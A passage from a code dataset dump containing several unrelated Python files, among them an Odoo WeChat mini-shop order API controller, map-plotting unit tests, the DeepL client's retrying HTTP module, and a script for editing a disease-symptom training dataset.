'goods_id': goods.id,\n 'price_unit': price,\n 'product_uom_qty': amount,\n }\n return total, line_dict\n\n def calculate_logistics_fee(self, goods, amount, transport_type, province_id, city_id, district_id):\n return 0\n\n def pre_check(self, entry, wechat_user, post_data):\n return\n\n\n @http.route('/wxa//order/statistics', auth='public', method=['GET', 'POST'], csrf=False)\n def statistics(self, sub_domain, token=None, **kwargs):\n '''\n closed = ('closed', u'已关闭')\n unpaid = ('unpaid', u'待支付')\n pending = ('pending', u'待发货')\n unconfirmed = ('unconfirmed', u'待收货')\n unevaluated = ('unevaluated', u'待评价')\n completed = ('completed', u'已完成')\n '''\n try:\n res, wechat_user, entry = self._check_user(sub_domain, token)\n if res:return res\n\n domain = self.get_orders_domain(None, **kwargs)\n orders = request.env['sale.order'].sudo().search(domain)\n order_statistics_dict = {order_status: 0 for order_status in defs.OrderStatus.attrs.keys()}\n for each_order in orders:\n order_statistics_dict[each_order.customer_status] += 1\n\n data = {\n \"count_id_no_reputation\": order_statistics_dict['unevaluated'],\n \"count_id_no_transfer\": order_statistics_dict['pending'],\n \"count_id_close\": order_statistics_dict['closed'],\n \"count_id_no_pay\": order_statistics_dict['unpaid'],\n \"count_id_no_confirm\": order_statistics_dict['unconfirmed'],\n \"count_id_success\": order_statistics_dict['completed']\n }\n return self.res_ok(data)\n\n except Exception as e:\n _logger.exception(e)\n return self.res_err(-1, str(e))\n\n def clean_html(self, content):\n pattern = re.compile(r'<[^>]+>',re.S)\n result = pattern.sub('', content)\n return result\n\n def _order_basic_dict(self, each_order):\n ret = {\n \"amountReal\": round(each_order.amount_total, 2),\n \"dateAdd\": dt_convert(each_order.create_date, gmt_diff=self.cur_gmt_diff),\n \"id\": each_order.id,\n \"remark\": self.clean_html(each_order.note),\n \"orderNumber\": each_order.name,\n \"goodsNumber\": each_order.number_goods,\n \"status\": defs.OrderResponseStatus.attrs[each_order.customer_status],\n \"statusStr\": self.get_statusStr(each_order),\n \"score\": 0,\n }\n return ret\n\n def get_statusStr(self, order):\n return defs.OrderStatus.attrs[order.customer_status]\n\n def get_orders_domain(self, status, **kwargs):\n domain = [('partner_id', '=', request.wechat_user.partner_id.id), ('number_goods', '>', 0)]\n if status and status!='9' and status.isdigit():\n domain.append(('customer_status', '=', defs.OrderRequestStatus.attrs[int(status)]))\n return domain\n\n @http.route('/wxa//order/list', auth='public', method=['GET', 'POST'], csrf=False)\n def list(self, sub_domain, token=None, status=None, **kwargs):\n try:\n res, wechat_user, entry = self._check_user(sub_domain, token)\n if res:return res\n\n kwargs['entry'] = entry\n domain = self.get_orders_domain(status, **kwargs)\n orders = request.env['sale.order'].sudo().search(domain, order='id desc', limit=30)\n delivery_product_id = request.env.ref('oejia_weshop.product_product_delivery_weshop').id\n self.cur_gmt_diff = entry.gmt_diff\n data = {\n \"logisticsMap\": {},\n \"orderList\": [self._order_basic_dict(each_order) for each_order in orders],\n \"goodsMap\": {\n each_order.id: [\n {\n \"pic\": each_goods.product_id.product_tmpl_id.main_img,\n \"number\": each_goods.product_uom_qty,\n \"name\": each_goods.name,\n \"price\": each_goods.price_unit,\n \"sku\": each_goods.product_id.get_property_str(),\n \"product_uom\": each_goods.product_uom.name,\n \"prodId\": each_goods.product_id.product_tmpl_id.id,\n } for each_goods in each_order.order_line if each_goods.product_id.id!=delivery_product_id]\n for each_order in orders}\n }\n if not data['orderList']:\n return self.res_err(700)\n return self.res_ok(data)\n\n except Exception as e:\n _logger.exception(e)\n return self.res_err(-1, str(e))\n\n\n @http.route('/wxa//order/detail', auth='public', method=['GET'])\n def detail(self, sub_domain, token=None, id=None, **kwargs):\n order_id = id\n try:\n res, wechat_user, entry = self._check_user(sub_domain, token)\n if res:\n if entry and kwargs.get('access_token'):\n pass\n else:\n return res\n\n if not order_id:\n return self.res_err(300)\n\n if kwargs.get('access_token'):\n order = request.env['sale.order'].sudo().search([\n ('access_token', '=', kwargs.get('access_token')),\n ('id', '=', int(order_id))\n ])\n if order:\n wechat_user = WechatUser(order.partner_id, request.env.user)\n else:\n order = request.env['sale.order'].sudo().search([\n ('partner_id', '=', wechat_user.partner_id.id),\n ('id', '=', int(order_id))\n ])\n\n if not order:\n return self.res_err(404)\n\n delivery_product_id = request.env.ref('oejia_weshop.product_product_delivery_weshop').id\n data = {\n \"code\": 0,\n \"data\": {\n \"orderInfo\": {\n \"amount\": order.goods_price,\n \"amountLogistics\": order.logistics_price,\n \"amountTax\": round(order.amount_tax, 2),\n \"amountReal\": round(order.amount_total, 2),\n \"dateAdd\": dt_convert(order.create_date, gmt_diff=entry.gmt_diff),\n \"dateUpdate\": dt_convert(order.write_date, gmt_diff=entry.gmt_diff),\n \"goodsNumber\": order.number_goods,\n \"id\": order.id,\n \"orderNumber\": order.name,\n \"remark\": self.clean_html(order.note),\n \"status\": defs.OrderResponseStatus.attrs[order.customer_status],\n \"statusStr\": defs.OrderStatus.attrs[order.customer_status],\n \"type\": 0,\n \"uid\": 1,#user.id,\n \"userId\": wechat_user.id,\n \"portal_messages\": [],\n },\n \"goods\": [\n {\n \"amount\": each_goods.price_unit,\n \"goodsId\": each_goods.product_id.product_tmpl_id.id,\n \"goodsName\": each_goods.name,\n \"id\": each_goods.product_id.id,\n \"number\": each_goods.product_uom_qty,\n \"product_uom\": each_goods.product_uom.name,\n \"orderId\": order.id,\n \"pic\": each_goods.product_id.product_tmpl_id.main_img,\n \"property\": each_goods.product_id.get_property_str(),\n \"propertyChildIds\": each_goods.product_id.attr_val_str,\n } for each_goods in order.order_line if each_goods.product_id.id!=delivery_product_id\n ],\n \"logistics\": {\n \"address\": order.address,\n \"provinceId\": order.province_id.id,\n \"cityId\": order.city_id.id,\n \"districtId\": order.district_id.id or 0,\n \"provinceStr\": order.province_id.name,\n \"cityStr\": order.city_id.name,\n \"areaStr\": order.district_id.name,\n \"linkMan\": order.linkman,\n \"mobile\": order.mobile,\n \"code\": order.zipcode,\n \"shipperCode\": order.shipper_id.code if order.shipper_id else '',\n \"shipperName\": order.shipper_id.name if order.shipper_id else '',\n \"status\": 0 if order.shipper_id else '',\n \"trackingNumber\": order.shipper_no if order.shipper_no else ''\n },\n },\n \"msg\": \"success\"\n }\n if order.shipper_no:\n self.build_traces(order, data)\n self.build_ext(order, data)\n order.get_detail_ext(data)\n\n return self.res_ok(data[\"data\"])\n\n except Exception as e:\n _logger.exception(e)\n return self.res_err(-1, str(e))\n\n def build_traces(self, order, data):\n pass\n\n def build_ext(self, order, data):\n pass\n\n @http.route('/wxa//order/close', auth='public', method=['GET', 'POST'], csrf=False)\n def close(self, sub_domain, token=None, orderId=None, **kwargs):\n order_id = orderId\n try:\n res, wechat_user, entry = self._check_user(sub_domain, token)\n if res:return res\n\n if not order_id:\n return self.res_err(300)\n\n order = request.env['sale.order'].sudo().search([\n ('partner_id', '=', wechat_user.partner_id.id),\n ('id', '=', int(order_id))\n ])\n\n if not order:\n return self.res_err(404)\n\n if order.state=='sale':\n return self.res_err(-99, u'该订单已被确认,无法取消')\n\n #order.write({'customer_status': 'closed'})\n order.action_cancel()\n\n #mail_template = request.env.ref('wechat_mall_order_closed')\n #mail_template.sudo().send_mail(order.id, force_send=True, raise_exception=False)\n\n return self.res_ok()\n\n except Exception as e:\n _logger.exception(e)\n return self.res_err(-1, str(e))\n\n\n @http.route('/wxa//order/delivery', auth='public', method=['GET', 'POST'], csrf=False)\n def delivery(self, sub_domain, token=None, orderId=None, **kwargs):\n '''\n 确认收货接口\n '''\n order_id = orderId\n try:\n res, wechat_user, entry = self._check_user(sub_domain, token)\n if res:return res\n\n if not order_id:\n return self.res_err(300)\n\n order = request.env['sale.order'].sudo().search([\n ('partner_id', '=', wechat_user.partner_id.id),\n ('id', '=', int(order_id))\n ])\n\n if not order:\n return self.res_err(404)\n\n order.action_receive()\n\n #mail_template = request.env.ref('wechat_mall_order_confirmed')\n #mail_template.sudo().send_mail(order.id, force_send=True, raise_exception=False)\n\n return self.res_ok()\n\n except Exception as e:\n _logger.exception(e)\n return self.res_err(-1, str(e))\n\n\n","repo_name":"JoneXiong/oejia_weshop","sub_path":"controllers/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":23118,"program_lang":"python","lang":"en","doc_type":"code","stars":266,"dataset":"github-code","pt":"65"} +{"seq_id":"38725230908","text":"from unittest import TestCase, main\nimport pandas as pd\nfrom tempfile import gettempdir\nimport numpy as np\nfrom os import remove\nfrom os.path import join\n\nfrom mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\nfrom skbio.util import get_data_path\n\nfrom ggmap.snippets import (drawMap)\nfrom ggmap.imgdiff import compare_images\n\nplt.switch_backend('Agg')\nplt.rc('font', family='DejaVu Sans')\n\n\nclass ReadWriteTests(TestCase):\n def setUp(self):\n # set following var to True to generate a new set of baseline plots\n # without testing and aborting after too many differences\n self.mode_generate_baseline = False\n self.dpi = 80\n self.meta_basemap = pd.read_csv(get_data_path(\n 'drawMap/basemap.meta.tsv'), sep='\\t', index_col=0)\n self.basemap_alaska = Basemap(llcrnrlat=43.,\n llcrnrlon=168.,\n urcrnrlat=63.,\n urcrnrlon=-110,\n resolution='i',\n projection='cass',\n lat_0=90.0,\n lon_0=-155.0)\n\n self.meta_basemap_migration = pd.read_csv(\n get_data_path('drawMap/basemap.meta.migration.tsv'),\n sep='\\t', index_col=0)\n\n def tearDown(self):\n self.assertFalse(self.mode_generate_baseline)\n\n def help_compare_drawmap(self, name, fig):\n \"\"\" Helper function to compare drawMap images \"\"\"\n file_plotname = 'basemap.%s.png' % name\n file_dummy = join(gettempdir(), file_plotname)\n fig.set_size_inches(16, 11)\n fig.savefig(file_dummy, dpi=self.dpi)\n res = compare_images(get_data_path('drawMap/'+file_plotname),\n file_dummy,\n file_image_diff='./diff.'+file_plotname)\n plt.close(fig)\n if not self.mode_generate_baseline:\n if res[0] is True:\n remove(file_dummy)\n return res[0]\n\n def test_drawMap_alaska(self):\n # create plot\n contrast = 'Anas crecca'\n availcolors = ['blue', 'green', 'orange', 'magenta']\n li = []\n meta_others = self.meta_basemap[\n self.meta_basemap['smj_genusspecies'] != contrast]\n for i, (n, g) in enumerate(meta_others.groupby('Q2')):\n li.append({'label': \"%s: %i\" % (n, g.shape[0]),\n 'color': availcolors[i],\n 'alpha': 1,\n 'coords': g})\n anas = self.meta_basemap[\n self.meta_basemap.smj_genusspecies == contrast]\n li.append({'label': \"%s: %i\" % (anas.smj_genusspecies.unique()[0],\n anas.smj_genusspecies.shape[0]),\n 'color': availcolors[len(li)],\n 'coords': anas,\n 'size': 10})\n\n fig, ax = plt.subplots()\n drawMap(li, basemap=self.basemap_alaska, ax=ax)\n\n # compare image\n self.assertTrue(self.help_compare_drawmap('alaska', fig))\n\n def test_drawMap_migration(self):\n pn = 0\n meta_mig = self.meta_basemap_migration.groupby(['q1_route',\n 'q1_habitat'])\n fix, axarr = fig, ax = plt.subplots(4, 1)\n for pn, (n, g) in enumerate(meta_mig):\n li = [\n {'label': 'summer, with data',\n 'color': 'red',\n 'coords': g[(g['q1_season'] == 'summer') &\n (g['hasData'] == np.True_)],\n 'alpha': 1},\n {'label': 'winter, with data',\n 'color': 'blue',\n 'coords': g[(g['q1_season'] == 'winter') &\n (g['hasData'] == np.True_)],\n 'alpha': 1},\n ]\n li.append(\n {'label': 'summer, without data',\n 'color': 'orange',\n 'coords': g[(g['q1_season'] == 'summer')],\n 'alpha': 1})\n li.append(\n {'label': 'winter, without data',\n 'color': 'purple',\n 'coords': g[(g['q1_season'] == 'winter')],\n 'alpha': 1})\n drawMap(reversed(li), ax=axarr[pn], no_legend=pn < 3)\n axarr[pn].set_title(\"%s %s (winter n=%i->%i, summer n=%i->%i)\" % (\n \" | \".join(g.smj_genus.unique()),\n \" | \".join(g.smj_species.unique()),\n li[1]['coords'].shape[0] +\n li[3]['coords'].shape[0],\n li[1]['coords'].shape[0],\n li[0]['coords'].shape[0] +\n li[2]['coords'].shape[0],\n li[0]['coords'].shape[0]))\n\n # compare image\n self.assertTrue(self.help_compare_drawmap('migration', fig))\n\n def test_drawMap_default(self):\n li = [{'coords': self.meta_basemap_migration}]\n fig, ax = plt.subplots()\n drawMap(li, ax=ax)\n self.assertTrue(self.help_compare_drawmap('default', fig))\n\n def test_drawMap_color(self):\n li = [{'coords': self.meta_basemap_migration,\n 'color': 'black'}]\n fig, ax = plt.subplots()\n drawMap(li, ax=ax)\n self.assertTrue(self.help_compare_drawmap('color', fig))\n\n def test_drawMap_size(self):\n li = [{'coords': self.meta_basemap_migration,\n 'size': 200}]\n fig, ax = plt.subplots()\n drawMap(li, ax=ax)\n self.assertTrue(self.help_compare_drawmap('size', fig))\n\n def test_drawMap_alpha(self):\n li = [{'coords': self.meta_basemap_migration,\n 'alpha': 0.1}]\n fig, ax = plt.subplots()\n drawMap(li, ax=ax)\n self.assertTrue(self.help_compare_drawmap('alpha', fig))\n\n def test_drawMap_label(self):\n li = [{'coords': self.meta_basemap_migration,\n 'label': 'Voegel'}]\n fig, ax = plt.subplots()\n drawMap(li, ax=ax)\n self.assertTrue(self.help_compare_drawmap('label', fig))\n\n def test_missing_coords(self):\n allcols = set(self.meta_basemap_migration.columns)\n with self.assertRaisesRegex(ValueError, '\"coords\" for every dict!'):\n drawMap([{'color': 'blue'}])\n\n with self.assertRaisesRegex(ValueError,\n 'need to have column \"latitude\"'):\n cols = allcols - set(['latitude'])\n drawMap([{'coords': self.meta_basemap_migration.loc[:, cols]}])\n\n with self.assertRaisesRegex(ValueError,\n 'need to have column \"longitude\"'):\n cols = allcols - set(['longitude'])\n drawMap([{'coords': self.meta_basemap_migration.loc[:, cols]}])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sjanssen2/ggmap","sub_path":"ggmap/test/test_snippets_drawmap.py","file_name":"test_snippets_drawmap.py","file_ext":"py","file_size_in_byte":6970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"38651710526","text":"def solve():\n # 24: What is the nth permutation of the digits 0 through 9 when lexographically ordered\n # runtime: O(log n)\n # ans = 2783915460\n\n # we assume that n < (10!)\n n = 1_000_000\n\n d_scrambled = 1\n fac = 1\n while n > fac:\n d_scrambled += 1\n fac *= d_scrambled\n\n d_sorted = 10 - d_scrambled\n ans = \"0123456789\"[:d_sorted]\n rest = list(\"0123456789\"[d_sorted:])\n\n # need to switch to 0-indexing for convenience\n n -= 1\n for div in range(d_scrambled, 0, -1):\n fac //= div\n d, n = divmod(n, fac)\n ans += rest.pop(d)\n print(ans)\n","repo_name":"TemporarilyTired/projecteuler","sub_path":"0/20/p24.py","file_name":"p24.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"30472039152","text":"# -*- coding: utf-8 -*-\n\nfrom math import sqrt\n\n\nclass Statistics:\n \"\"\"\n Compute variance and standard deviation \"online\", that is, without needing\n all the values to be stored.\n\n A Python implementation of Welford's method as described here:\n https://www.johndcook.com/blog/standard_deviation/\n \"\"\"\n\n n = 0\n old_s = 0.0\n\n def __init__(self, initial=None):\n if initial:\n for x in initial:\n self.append(x)\n\n def append(self, x):\n self.n += 1\n if self.n == 1:\n self.old_m = x\n self.new_m = x\n else:\n self.new_m = self.old_m + (x - self.old_m) / self.n\n self.new_s = self.old_s + (x - self.old_m) * (x - self.new_m)\n self.old_m = self.new_m\n self.old_s = self.new_s\n\n def mean(self):\n if self.n == 0:\n raise ValueError('Mean is undefined')\n return self.new_m\n\n def variance(self):\n if self.n <= 1:\n raise ValueError('Variance is undefined')\n return self.new_s / (self.n - 1)\n\n def stdev(self):\n return sqrt(self.variance())\n","repo_name":"timb07/online_stats","sub_path":"online_stats/online_stats.py","file_name":"online_stats.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"32104204790","text":"# @Time : 2019/12/13 11:20\n# @Author : Libuda\n# @FileName: create_txt.py\n# @Software: PyCharm\n\n# @Time : 2019/12/13 11:12\n# @Author : Libuda\n# @FileName: create_txt.py\n# @Software: PyCharm\nimport os\n\ntrain_file_path = r\"C:\\Users\\lenovo\\PycharmProjects\\insightface\\data\\re\\train\"\ntrain_res_txt_path = r\"C:\\Users\\lenovo\\PycharmProjects\\insightface\\mylearn\\train.txt\"\n\ntest_file_path = r\"C:\\Users\\lenovo\\PycharmProjects\\insightface\\data\\re\\test\"\ntest_res_txt_path = r\"C:\\Users\\lenovo\\PycharmProjects\\insightface\\mylearn\\test.txt\"\n\nwith open(train_res_txt_path, 'w') as f:\n print(123)\n for root, dir, files in os.walk(train_file_path):\n root = root.split(\"\\\\\")[-1]\n for file in files:\n label = str(int(int(file.split(\".\")[0]) / 100) - 3)\n tem = root + \"/\" + file\n print(tem)\n f.write(tem + \" \" + label + \"\\n\")\n","repo_name":"budaLi/leetcode-python-","sub_path":"图片过滤脚本/create_txt.py","file_name":"create_txt.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"65"} +{"seq_id":"33548441514","text":"import unittest\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\n\nfrom pytorch_adapt.hooks import ATDOCHook\nfrom pytorch_adapt.layers import ConfidenceWeights, NeighborhoodAggregation\n\n\ndef get_data(dataset_size, feature_dim, num_classes, batch_size):\n target_imgs_features = torch.randn(batch_size, feature_dim)\n target_imgs_features_logits = torch.randn(batch_size, num_classes)\n target_sample_idx = torch.randint(0, dataset_size, size=(batch_size,))\n\n return {\n \"target_imgs_features\": target_imgs_features,\n \"target_imgs_features_logits\": target_imgs_features_logits,\n \"target_sample_idx\": target_sample_idx,\n }\n\n\nclass TestATDOC(unittest.TestCase):\n def test_atdoc_hook(self):\n torch.manual_seed(922)\n dataset_size = 10000\n feature_dim = 128\n num_classes = 10\n batch_size = 64\n iters = 10\n\n seed = 545\n torch.manual_seed(seed)\n h = ATDOCHook(dataset_size, feature_dim, num_classes)\n all_losses = []\n for i in range(iters):\n data = get_data(dataset_size, feature_dim, num_classes, batch_size)\n outputs, losses = h(data)\n all_losses.append(losses[\"pseudo_label_loss\"])\n\n torch.manual_seed(seed)\n na = NeighborhoodAggregation(dataset_size, feature_dim, num_classes)\n all_correct_losses = []\n for i in range(iters):\n data = get_data(dataset_size, feature_dim, num_classes, batch_size)\n pseudo_labels, neighbor_preds = na(\n data[\"target_imgs_features\"],\n data[\"target_imgs_features_logits\"],\n update=True,\n idx=data[\"target_sample_idx\"],\n )\n loss = F.cross_entropy(\n data[\"target_imgs_features_logits\"], pseudo_labels, reduction=\"none\"\n )\n loss = torch.mean(loss * ConfidenceWeights()(neighbor_preds))\n all_correct_losses.append(loss)\n\n self.assertTrue(\n all(\n np.isclose(x, y.item(), rtol=1e-2)\n for x, y in zip(all_losses, all_correct_losses)\n )\n )\n","repo_name":"KevinMusgrave/pytorch-adapt","sub_path":"tests/hooks/test_atdoc.py","file_name":"test_atdoc.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":292,"dataset":"github-code","pt":"65"} +{"seq_id":"29405341240","text":"from . import version\nfrom .exceptions import ConnectionException\nimport http\nimport random\nimport requests\nimport time\nfrom typing import Optional, Tuple, Union\nfrom .util import log_info\n\n\nuser_agent = f\"deepl-python/{version.VERSION}\"\nmax_network_retries = 5\nmin_connection_timeout = 10.0\n\n\nclass _BackoffTimer:\n \"\"\"Implements exponential-backoff strategy.\n This strategy is based on the GRPC Connection Backoff Protocol:\n https://github.com/grpc/grpc/blob/master/doc/connection-backoff.md\"\"\"\n\n BACKOFF_INITIAL = 1.0\n BACKOFF_MAX = 120.0\n BACKOFF_JITTER = 0.23\n BACKOFF_MULTIPLIER = 1.6\n\n def __init__(self):\n self._num_retries = 0\n self._backoff = self.BACKOFF_INITIAL\n self._deadline = time.time() + self._backoff\n\n def get_num_retries(self):\n return self._num_retries\n\n def get_timeout(self):\n return max(self.get_time_until_deadline(), min_connection_timeout)\n\n def get_time_until_deadline(self):\n return max(self._deadline - time.time(), 0.0)\n\n def sleep_until_deadline(self):\n time.sleep(self.get_time_until_deadline())\n\n # Apply multiplier to current backoff time\n self._backoff = min(\n self._backoff * self.BACKOFF_MULTIPLIER, self.BACKOFF_MAX\n )\n\n # Get deadline by applying jitter as a proportion of backoff:\n # if jitter is 0.1, then multiply backoff by random value in [0.9, 1.1]\n self._deadline = time.time() + self._backoff * (\n 1 + self.BACKOFF_JITTER * random.uniform(-1, 1)\n )\n self._num_retries += 1\n\n\nclass HttpClient:\n def __init__(self):\n self._session = requests.Session()\n self._session.headers = {\"User-Agent\": user_agent}\n pass\n\n def close(self):\n self._session.close()\n\n def request_with_backoff(\n self, method: str, url: str, data: Optional[dict], **kwargs\n ) -> Tuple[int, Union[str, requests.Response]]:\n \"\"\"Makes API request, retrying if necessary, and returns response.\n\n Return and exceptions are the same as function request().\"\"\"\n backoff = _BackoffTimer()\n while True:\n response: Optional[Tuple[int, Union[str, requests.Response]]]\n try:\n response = self.request(\n method, url, data, timeout=backoff.get_timeout(), **kwargs\n )\n exception = None\n except Exception as e:\n response = None\n exception = e\n\n if not self._should_retry(\n response, exception, backoff.get_num_retries()\n ):\n if response is not None:\n return response\n else:\n raise exception\n\n if exception is not None:\n log_info(\n f\"Encountered a retryable-exception: {str(exception)}\"\n )\n\n log_info(\n f\"Starting retry {backoff.get_num_retries() + 1} for request {method} {url} \"\n f\"after sleeping for {backoff.get_time_until_deadline():.2f} seconds.\"\n )\n backoff.sleep_until_deadline()\n\n def request(\n self,\n method: str,\n url: str,\n data: Optional[dict],\n timeout: float,\n stream: bool = False,\n **kwargs,\n ) -> Tuple[int, Union[str, requests.Response]]:\n \"\"\"Makes API request and returns response content.\n\n Response is returned as HTTP status code and either content string (if\n stream is False) or response (if stream is True).\n\n If no response is received will raise ConnectionException.\"\"\"\n try:\n if stream:\n response = self._session.request(\n method,\n url,\n data=data,\n timeout=timeout,\n stream=True,\n **kwargs,\n )\n return response.status_code, response\n\n else:\n with self._session.request(\n method, url, data=data, timeout=timeout, **kwargs\n ) as response:\n response.encoding = \"UTF-8\"\n return response.status_code, response.text\n\n except (\n requests.exceptions.Timeout,\n requests.exceptions.ConnectionError,\n ):\n message = \"Connection failed or request timed out.\"\n should_retry = True\n except (requests.exceptions.RequestException, Exception) as e:\n message = f\"Unexpected connection error: {e}\"\n should_retry = False\n\n raise ConnectionException(message, should_retry=should_retry)\n\n def _should_retry(self, response, exception, num_retries):\n if num_retries >= max_network_retries:\n return False\n\n if response is None:\n return exception.should_retry\n\n status_code, _ = response\n # Retry on Too-Many-Requests error and internal errors except\n # Service-Unavailable errors\n return status_code == http.HTTPStatus.TOO_MANY_REQUESTS or (\n status_code >= http.HTTPStatus.INTERNAL_SERVER_ERROR\n and status_code != http.HTTPStatus.SERVICE_UNAVAILABLE\n )\n","repo_name":"yamajackr/Kotonoha","sub_path":"Kotonoha/libs/deepl/http_client.py","file_name":"http_client.py","file_ext":"py","file_size_in_byte":5295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"7676801758","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # PROGRAM_TO_ADD_DISEASES_TO_DATASET \n\n# # PROGRAM SHOULD BE ABLE TO PERFORM - \n# ## -> See Symtomps arranged ALPHABETICALLY\n# ## -> Search For Symptoms\n# ## -> Add Symptoms\n# ## -> Add Disease\n# ## -> Update Disease_Symtoms or Disease_Name or Symptom_Name\n# ## -> Delete DISEASE or SYMPTOM\n# ## -> Update Dataset On Exit\n\nimport numpy as np\nimport pandas as pd\nimport os , shutil\nimport re\nfrom prettytable import PrettyTable\nfrom sklearn.naive_bayes import MultinomialNB\nfrom Decision_Tree.decision_tree import train_decision_tree_model\nfrom K_Nearest_Neighbors.knn import train_KNN_model\nfrom Kernel_SVM.kernel_svm import train_SVC_model\nfrom Logistic_Regression.logistic_regression import train_Logistic_regression_model\nfrom Naive_Bayes.naive_bayes import train_naive_bayes_model\nfrom Random_Forest.random_forest import train_random_forest_model\n\n\ndef clear():\n os.system('cls')\n\n\ndef save_on_exit(num , dataset_copy):\n if not os.path.exists(os.getcwd() + '\\Datasets\\SHDPS_ARCHIVE'):\n os.mkdir(os.getcwd() + '\\Datasets\\SHDPS_ARCHIVE')\n if not dataset.equals(dataset_copy):\n shutil.move(ORIGINAL , DESTINATION)\n dataset_copy.to_csv(f'Datasets/SHDPS_Training_{num+1}.csv')\n print(\"---------DATASET SAVED SUCCESSFULLY-----------\\nThank's For Using...\")\n exit()\n else:\n # clear()\n print(\"---------DATASET Wasn't ALTERED-----------\\nThank's For Using...\")\n exit()\n\n\ndef train_all_ML_models(dataset_copy):\n clear()\n print('Processing.........\\nPlease Wait.')\n train_decision_tree_model(dataset_copy)\n train_KNN_model(dataset_copy)\n train_SVC_model(dataset_copy)\n train_Logistic_regression_model(dataset_copy)\n train_naive_bayes_model(dataset_copy)\n train_random_forest_model(dataset_copy)\n clear()\n print('-----------ALL MODELS TRAINED SUCCESSFULLY---------------')\n\n\n# ### TASK -> See Symptoms Arranged ALPHABETICALLY\n\ndef see_symptoms():\n clear()\n symptoms = list(dataset_copy.columns[1:])\n first_alpha = set([symptom[0] for symptom in symptoms])\n ask_first_alpha = input('Enter the First Alphabet of symptom which you want to look\\n :: ').lower()\n while ask_first_alpha not in first_alpha:\n print('----------No Symptom Found--------------')\n ask_first_alpha = input('Enter the First Alphabet of Symptom which you want to look\\n :: ').lower()\n myTable = PrettyTable([ 'ID' , f'SYMPTOMS Starting with \"{ask_first_alpha.upper()}\"'])\n for index , symptom in enumerate(symptoms):\n if symptom.startswith(ask_first_alpha):\n myTable.add_row([index+1 , symptom])\n clear()\n print(myTable)\n\n\n# ### TASK -> SEARCH for SYMPTOMS \n\ndef search_symptoms():\n clear()\n asked_symptom = input('Enter the Symtom which you want to Search\\n :: ').lower()\n retrived_matches = list(set(list(dataset.filter(like=asked_symptom , axis=1).columns) + list(dataset.filter(regex=f'^{asked_symptom}' , axis = 1).columns) + list(dataset.filter(regex=f'^{asked_symptom[0:2]}' , axis = 1).columns)))\n if len(retrived_matches) != 0:\n myTable = PrettyTable([ 'ID' , f'Symptoms matching with \"{asked_symptom.upper()}\"'])\n for index , row in enumerate(retrived_matches):\n myTable.add_row([index+1 , row])\n print(myTable)\n else:\n print('\\t---------No Matches Found------------')\n\n\n# ### TASK -> ADD SYMPTOM TO DATASET\n\ndef add_symptom():\n clear()\n symptom_to_add = input(\"Enter Symptom to ADD (PLEASE VERIFY IF IT'S PRESENT)\\n :: \").lower()\n symptom_to_add = '_'.join(symptom_to_add.split())\n if symptom_to_add in dataset_copy.columns[1:]:\n print('----------Symptom Already Present----------------')\n else:\n dataset_copy[symptom_to_add] = 0\n print('-------------Symptom Successfully ADDED------------')\n\n\n# ### TASK -> ADD DISEASE \n\n# dataset_copy.loc[dataset_copy.shape[0]] = ['Cancer'] + [0] * len(dataset_copy.columns[1:])\n# dataset_copy.drop(index=4920 , inplace=True)\n\ndef first_character_approach(disease):\n clear()\n user_decision = 'Y'\n symptoms_to_add = []\n while True:\n clear()\n user_decision = input(f'Do you want to ADD MORE Symptoms for {disease.upper()} ( Y- YES , N - NO) (MINIMUM - 5)\\n :: ').upper()\n if user_decision != 'Y':\n break\n symptoms = list(dataset_copy.columns[1:])\n first_alpha = set([symptom[0] for symptom in symptoms])\n ask_first_alpha = input('Enter the First Alphabet of symptom which you want to look\\n :: ').lower()\n while ask_first_alpha not in first_alpha:\n print('----------No Symptom Found--------------')\n ask_first_alpha = input('Enter the First Alphabet of Symptom which you want to look\\n :: ').lower()\n myTable = PrettyTable([ 'ID' , f'SYMPTOMS Starting with \"{ask_first_alpha.upper()}\"'])\n for index , symptom in enumerate(symptoms):\n if symptom.startswith(ask_first_alpha):\n myTable.add_row([index+1 , symptom])\n clear()\n myTable.sortby = f'SYMPTOMS Starting with \"{ask_first_alpha.upper()}\"'\n myTable.align[f'SYMPTOMS Starting with \"{ask_first_alpha.upper()}\"'] = 'r'\n print(myTable)\n symptoms_to_add_str = input('Enter the ID Corresponding to the SYMPTOMS which you want to ADD(\"SPACE SEPARATED\") or PRESS ENTER NOT\\n :: ') or None\n if symptoms_to_add_str != None:\n symptoms_to_add_str = list(map(int , symptoms_to_add_str.split()))\n id_check = True\n for symptom_id in symptoms_to_add_str:\n if symptom_id not in range(1 , len(dataset_copy.columns[1:])+1):\n id_check = False\n if not id_check:\n clear()\n print(\"-----------One or More ID's was OUT OF RANGE----------------- !\\n TRY AGAIN!!\")\n else:\n symptoms_to_add = symptoms_to_add + symptoms_to_add_str\n symptoms_names = [0]*len(dataset_copy.columns[1:])\n for i in range(1 , len(dataset_copy.columns[1:])+1):\n if i in symptoms_to_add:\n symptoms_names[i-1] = 1\n return symptoms_names\n\n\ndef full_symptom_table_approach():\n clear()\n all_symtoms = enumerate(dataset_copy.columns[1:])\n myTable = PrettyTable(['ID' , 'ALL SYMPTOMS'])\n for row in all_symtoms:\n myTable.add_row([row[0]+1 , row[1]])\n myTable.sortby = 'ALL SYMPTOMS'\n myTable.align['ALL SYMPTOMS'] = 'r'\n print(myTable)\n symptoms_to_add = input('Enter the ID Corresponding to the SYMPTOMS which you want to ADD(\"SPACE SEPARATED\")\\n :: ')\n symptoms_to_add = list(map(int , symptoms_to_add.split()))\n id_check = True\n for symptom_id in symptoms_to_add:\n if symptom_id not in range(1 , len(dataset_copy.columns[1:])+1):\n id_check = False\n if not id_check:\n clear()\n print(\"-----------One or More ID's was OUT OF RANGE----------------- !\\n TRY 